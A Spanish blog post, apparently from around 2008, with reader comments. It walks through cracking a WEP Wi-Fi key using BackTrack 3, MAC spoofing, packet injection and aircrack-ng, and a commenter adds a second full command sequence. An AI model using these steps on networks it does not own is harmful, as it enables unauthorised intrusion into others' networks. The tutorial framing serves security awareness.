Crackear una wep con BackTrack 3 (tan facil poner en jaque a la inalambrica)
Dejo este video que me encontré en Youtube donde se muestran unos sencillos pasos a seguir para crackear una red inalambrica… lo ideal seria saltar a wpa, y solo hacer conciencia de lo critico que es el poner un poco de atencion a las cuestiones de seguridad.
Probarlo con el vecino seria tentador, pero espero que no lo hagan :S… pero es bueno que lo hagan de forma local para probar que tan vulnerable es nuestra red.
Los pasos a groso modo de este procedimiento son:
# airmon-ng
# airmon-ng stop wlan0
# ifconfig wlan0 down
# macchanger –mac 00:11:22:33:44:55 wlan0
# airmon-ng start wlan0
# airodump-ng wlan0
Apretamos para detener push ctrl+c
-
Copiamos el BSSID de la red que queramos crackear
# airodump-ng -c (numero del canal) -w wep123 –bssid (bssid) wlan0
- mientras pwr sea mas grande, mejor
- el #Data debe ser alrededor de 10mil, para forzarlo:
#aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) wlan0
#aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
Ahora esperamos a que nuestro #Data sobrepase los 20mil y al hacerlo ejecutar…
# aircrack-ng -n 64 -b (bssid) wep123-01.cap
Nota: El cap file esta en la carpeta home, puse wep123-01.cap pensando en que fue el primer intento.
Salu2!
Thank you your video is very good, but when we are executing aircrack, it appears a message that says: Opening wep123-01.cap, Killedg packets, please wait….. what can we do ?????
i dont know actually … maybe wait? lol… xD
i didnt have a good answer but u can go to the forums of remote-exploit looking for a good one: http://forums.remote-exploit.org/
good luck!
Well but i have a laptop toshiva with a chipset atheros do you think it will work????? that’s the only part where we have problems!!! but still thank you for your video!!!
well… maybe… (i believe that yes… ) but i suggest that make a visit to this page: http://www.aircrack-ng.org/doku.php?id=compatibility_drivers
i actually use an usb wireless card
How much is a wireless card and where can buy it???? thanks, i hope it works
mmm… well maybe between $20 and $35 dollars… (mine’s cost $300 pesos)… u can go to any pc shop or … ebay.com, mercadolibre.com.mx…
but… like u say before u should check the type of chipset and if u can use it on linux (drivers and all that kind of thinks)…
if helps, with my usb card i only had to put on and run the live cd of backtrack 2 (in backtrack 3 beta doesnt work, but i havent check if runs well on final version of backtrack 3)…
ok what chipset would you advice me to buy, i have windows vista and backtrack 3 ??? Thanks
well… i have a 802.11g Wireless USB 2.0 Adapter, REALTEK 8187 Chipset … but i only probe it on Windows XP and Backtrack 2 … i dont know if i can suggest to you to buy it, but its what i use
You can see this adapter here:
http://www.meritline.com/ieee-802-11g-wireless-mini-usb-pen-drive.html
Que tal!
Yo acabo de descargar BackTrack (la ultima version) y lo queme en un disco como una imagen, pero a usarla pe pide el login y el pasword, uso los que son por default he intento iniciar la interfaz grafica con startx, pero no apoarece nada, solo una pantalla que con el sistema de archivos.
Espero que me puedas ayudar o recomendar algun tutorial, te lo agradeceria mucho.
K onda cuervo… pues… no se si hayas intentado hacer primero:
#xconf
#startx
Eso debería funcionar… bueno, asi pasaba con el BackTrack 2 para que no hubiera lios… podrías también darle una checada a mis “Enlaces Interesantes” en particular checa el de remote-exploit.org… o busca en el foro de remote-exploit más información (incluso podrías preguntar ahi para resolver las dudas que te vayan surgiendo):
http://forums.remote-exploit.org/
De lo poco que pueda ayudar ya sabes… avisame cuando resuelvas el problema y dime como lo hiciste jaja… o si sigues con lios pues igual lo platicamos para ver que solución encontramos!
salu2!
que onda richi no sabia que hablabas espanol. olle mira no se que tarjeta usb comprar cual me recomiendas o sino dime una tarjeta inalambrica aunque no sea usb para poder injectar con backtrack 3. o dame tu e-mail el mio es emmanuel.2706@hotmail.com agregame
listo emmanuel, ya te agregue… a ver si de rato platikamos jaja
que onda richie olle al instalar el cd e instalacion de tu ttarjeta usb realtek 8187 en windows automaticamente lo hace en backtrack 3???? espero tu respuesta!!
nop, no lo hace automático… pues… mira, cuando se trata de usar el live-cd de backtrack a veces basta con que dejes conectada tu tarjeta usb para que backtrack en automatico al cargar se encargue de reconocer el dispositivo… de no ser asi se me ocurriria utilizar un driver genérico… puedes visitar los foros oficiales de backtrack para pedir mas informacion o deja un comment en alguna parte del blog para ver si encontramos solucion, salu2!
Que tal Yo lo intente en una lap Acer con tarjeta Broadcom y todo va bien hasta que llego al ultimo paso donde se usa el aircrack-ng en la tercer ventana por que al dar enter como que se reinicia y me abre de nuevo el sistema backtrack como si hubiera reiniciado la maquina, que sera alguien me pueder ayudar o dar orientacion, Gracias y saludos.
que onda .. perfecto !!! si se pudo :d , nadamas que yo no lo ise desde BACKTRACK o WIFISLAX, sino desde UBUNTU 8.10 solamente descrage de los repositorios AIRCRACK apt-get install aircrack macchenager y listo .. segui todos los pasos !!! muchas gracias !!!! nos vemos !
yo emplie una tarjeta de red inalambrica para PCI REALTEK RTL 8087 y anduvo todo a la perfeccion !!! gracias !!
Hola. Me ha ligado toda la técnica menos la última, pues cuando utilizo el aircrack-ng -n 64 -b (bssid) wep123-01.cap me pide que ingrese un nombre de diccionario. Qué le puedo hacer. Tengo una tarjeta inalámbrica SATRA SA-WN551G de chipset Atheros.
Gracias por la ayuda.
que bueno que nos das esa info!!! me alegro que funcionara… salu2!
Hola,,mira,,hago todo pero al llegar a este punto me da error,,vamos que no quiere ponermelo en modo monitor:
root@sku-laptop:/home/sku# airmon-ng start wlan0
Interface Chipset Driver
wlan0 iwl3945 – [phy0]/usr/local/sbin/airmon-ng: 856: cannot create /sys/class/ieee80211/phy0/add_iface: Directory nonexistent
Error for wireless request “Set Mode” (8B06) :
SET failed on device mon0 ; No such device.
mon0: ERROR mientras se obtenían las banderas de interfaz: No existe el dispositivo
(monitor mode enabled on mon0)
hola que tal ? yo tuve un problema a la hora de hacer el airodump con el canal y la bssid, m marca el error ->”airodump-ng –help” for help.<-, he revisado bien paso a paso las instrucciones, los comandos,y no logro hacer que se quite, m puedes ayudar?
Hola Richie,
Tengo un problema, todo va bien hasta el momento de hacer que se generen los #DATA, se quedan en ceros, y obvio al llegar al paso del aircrack pues el archivo donde se supone se guerdaria todo no tiene nada, ya que no se genero ningun #DATA, alguna sugerencia, comot e comento, todo marcha bien, no hay error en ningun paso, solo es esa parte, alguna opinion acerca de esta situacion?
gracias.
Hola
quisiera saber si el backtrack trabaja con broadcoms o railink?
y si me pudieres dar la modificacion o comandos nuevos a utilizar
gracias.
ya lo he intentado y ha funcionado, pero al llegar al paso
# airmon-ng start wlan0
(iniciar despeus del macchanger)
el wireless deja de detectar las conexiones y no obtengo ningun paquete
ayuda porfavor
hola , tengo una tarjeta satra y quisiera saber los pasos para hackea redes que estan llenas y con seguridad
gracias
yo consegui que el Backtrack 3 USB funcione a la perfeccion con una Acer aspire 4315 con tarjeta de red atheros 5007EG sin problemas, solo que los pasos que sigo para trabajar son los siguientes:
airmon-ng start wifi0 (Pone la tarjeta en modo monitor)
airodump-ng ath1 (Busca redes disponibles y muestra AP MAC)
airodump-ng -c [channel] –bssid [AP MAC] -w [filename] ath1
donde (no hay que poner los corchetes):
channel: es el canal
AP MAC es la direccion mac 00:00:00:00:00:00
filename: es el nombre de archivo que le quieras dar, por ejemplo: casa
Abres otra terminal
aireplay-ng –fakeauth 0 -e [AP SSID] -a [AP MAC] ath1
AP ASSID es el nombre de la red o punto de acceso
tiene que salir esto:
Sending Authentication Request
authentication successful
Sending association request
Association successful
Empiezas a inyectar:
aireplay-ng -3 -b [AP MAC] ath1 -x250
La columna DATA de la primera terminal empieza a subir, cuando llegue a 5000 abre una tercera terminal
aircrack-ng -z -b [AP MAC] [filename*.cap]
en filename debes poner el nombre del archivo que escogiste antes, no se olvide poner el asterisco: casa*.cap (el programa empieza a comprobar los archivos DATA)
Si sale: failed wait to 10000 ivs solo teclea ctrl C y sale BT abajo, aprieta flecha hacia arriba para que vuelva a escribir lo mismo, espera hasta que la columnaDATA llegue a 10000 y aprieta enter, espera un poco y ya tienes lo que buscas
eY k dices richie?! espero que sigas leyendo esto…xD a ver si me puedes ayudar tio
Lo primero es que me tengo que comprar (que requisitos minimos tiene que tener lo del wifi…xD)
y lo segundo es, que si se puede hacer desde windows (vista).
Espero que lo leas lokoooo! Un saludo.
Si puedes agregarme mejor …
Aston.Ibiza@gmail.com
Gracias de antemano Suerte!